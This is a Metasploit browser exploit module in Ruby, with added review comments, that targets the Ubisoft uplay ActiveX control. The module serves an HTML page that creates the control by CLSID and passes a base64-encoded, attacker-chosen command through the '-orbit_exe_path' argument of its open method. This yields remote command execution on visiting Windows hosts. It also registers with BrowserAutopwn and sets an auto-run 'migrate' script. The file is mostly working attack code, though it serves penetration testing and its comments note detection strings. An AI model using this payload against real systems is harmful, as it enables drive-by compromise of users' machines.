##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Metasploit browser module for the Ubisoft uplay ActiveX control (see the
# seclists reference in the module info). It answers an HTTP request with one
# HTML page that instantiates the control by CLSID and calls its open method
# with a launcher argument string carrying the configured COMMAND, base64-encoded.
#
# Defensive context, taken from the module's own description: the issue is
# reported fixed as of uplay 2.04, it needs a signed-in (or auto-sign-in) user
# with uplay not already running, and it was only confirmed on Windows XP.
# The CLSID used below is the identifier to search for when checking whether a
# host still has the control registered, or when inspecting served pages.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  # Client-selection hints handed to the BrowserAutopwn mixin: Windows,
  # Internet Explorer, JavaScript enabled.
  # NOTE(review): :classid / :method are presumably used by the mixin to test
  # client-side that the control and method exist - confirm against the mixin.
  # NOTE(review): on_request_uri calls `open` on the control, not
  # DownloadImageFileURL; the :method value looks carried over from another
  # module - confirm.
  autopwn_info({
    :os_name    => OperatingSystems::WINDOWS,
    :ua_name    => HttpClients::IE,
    :javascript => true,
    :rank       => NormalRanking,
    :classid    => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}",
    :method     => "DownloadImageFileURL",
  })

  # Registers the module metadata and the single COMMAND option.
  #
  # @param info [Hash] caller-supplied metadata merged in by update_info
  def initialize(info = {})
    # The description text and its closing brace stay flush-left so the string
    # content is exactly what the original listing produced.
    # NOTE(review): "Mon 20th July" predates the DisclosureDate given further
    # down (Jul 29 2012); the fix date looks mistyped - confirm.
    super(
      update_info(
        info,
        'Name'           => 'Ubisoft uplay Active X Control Arbitrary Code Execution',
        'Description'    => %q{
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be running.
Tested in Win XP, does not appear to work in Win7.
Fixed as of 2.04 Mon 20th July.
},
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Initial discovery
            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
            'phillips321 <phillips321[at]phillips321.co.uk>',
            'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
          ],
        'Version'        => '$Revision$',
        'References'     =>
          [
            [ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
          ],
        'DefaultOptions' =>
          {
            'InitialAutoRunScript' => 'migrate -f',
          },
        'Platform'       => 'win',
        'Targets'        =>
          [
            [ 'Automatic', { } ],
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Jul 29 2012'
      )
    )

    # COMMAND is required and defaults to calc.exe.
    register_options(
      [
        OptString.new('COMMAND', [ true, "The command to execute on the remote host.", "calc.exe"])
      ],
      self.class
    )
  end

  # Always false.
  # NOTE(review): presumably keeps the module out of automatic selection -
  # the caller is not visible in this file; confirm.
  def autofilter
    false
  end

  # Delegates to use_zlib, which is defined outside this file.
  def check_dependencies
    use_zlib
  end

  # Handles one HTTP request: builds the HTML page and sends it to the client.
  #
  # @param cli the connected client, as passed in by the HTTP server mixin
  # @param request the incoming request (not read by this method)
  def on_request_uri(cli, request)
    # Base URL of this server as seen by the client. Nothing below reads
    # `url`; the computation is kept so the method behaves exactly as before.
    listen_host =
      if datastore['SRVHOST'] == '0.0.0.0'
        Rex::Socket.source_address(cli.peerhost)
      else
        datastore['SRVHOST']
      end
    url = "http://" + listen_host + ":" + datastore['SRVPORT'].to_s + get_resource + "/"

    # Length guard chosen by the module authors; the reason for 693 is not
    # shown here. On this path the method returns without sending a response.
    command = datastore['COMMAND']
    if command.length > 693
      print_status "Command too long must be < 694 characters"
      return
    end

    cmd = Rex::Text.encode_base64(command)
    classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39"
    type = "application/x-uplaypc" # MIME type noted by the authors as an alternative to classid; never read

    # The page creates an OBJECT element with the control's CLSID and calls its
    # open method; the encoded command follows -orbit_exe_path. That CLSID and
    # argument name are the strings to match when inspecting page content.
    content = "<html><body><script>x = document.createElement('OBJECT');x.classid='#{classid}';document.body.appendChild(x);x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');</script></body></html>"

    print_status("Sending exploit HTML")
    send_response_html(cli, content)
    handler(cli)
  end
end